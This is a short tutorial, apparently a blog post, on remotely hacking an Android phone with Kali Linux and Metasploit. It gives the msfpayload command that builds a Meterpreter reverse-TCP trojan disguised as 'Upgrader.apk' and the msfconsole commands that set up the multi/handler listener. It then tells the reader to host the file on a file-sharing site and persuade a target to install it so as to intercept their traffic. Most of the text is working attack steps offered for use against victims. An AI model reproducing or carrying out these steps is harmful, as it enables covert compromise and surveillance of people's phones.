Exploiting a Mobile Device Remotely
Exploiting a Mobile Device Remotely
Kali Linux, a known toolkit for exploiting computers, is also one of the most efficient tools to perform a hack on a mobile device. Follow these steps to perform a remote hack on a mobile device and install a malicious file on a targeted device.
1. Pull up Kali Linux
Type the following command:
msfpayload android/meterpreter/reverse_tcp LHOST=[your device’s IP address] R > /root/Upgrader.apk
2. Pull up a new terminal
While Kali is creating your file, load another terminal and load the metasploit console. To do that, enter the command:
Msfconsole
3. Set up the listener
Once metasploit is up, load the multi-handler exploit by entering the command:
use exploit/multi/handler
Afterward, create the reverse payload by typing the following command:
set payload android/meterpreter/reverse_tcp
Next, you will need to set up the L host type in order for you to start receiving traffic. To do that, type the following command:
set LHOST [Your device’s IP address]
4. Start the exploit
Now that you have your listener ready, you can now start your exploit by activating your listener. To do this, type the command:
Exploit
If the malicious file or Trojan that you have created a while ago is ready, copy it from the root folder to your mobile device, preferably an android phone. Afterwards, make that file available by uploading it on any file-sharing site such as speedyshare or Dropbox. Send the link to your target, and ask him to install the app.
O n c e y o u r t a r g e t u s e r h a s in s t alle d t h e file , y o u c a n n o w r e c eiv e t h e t r a f fic t h a t h e is r e c eivin g t h r o u g h his m o bile d e vic e!


No comments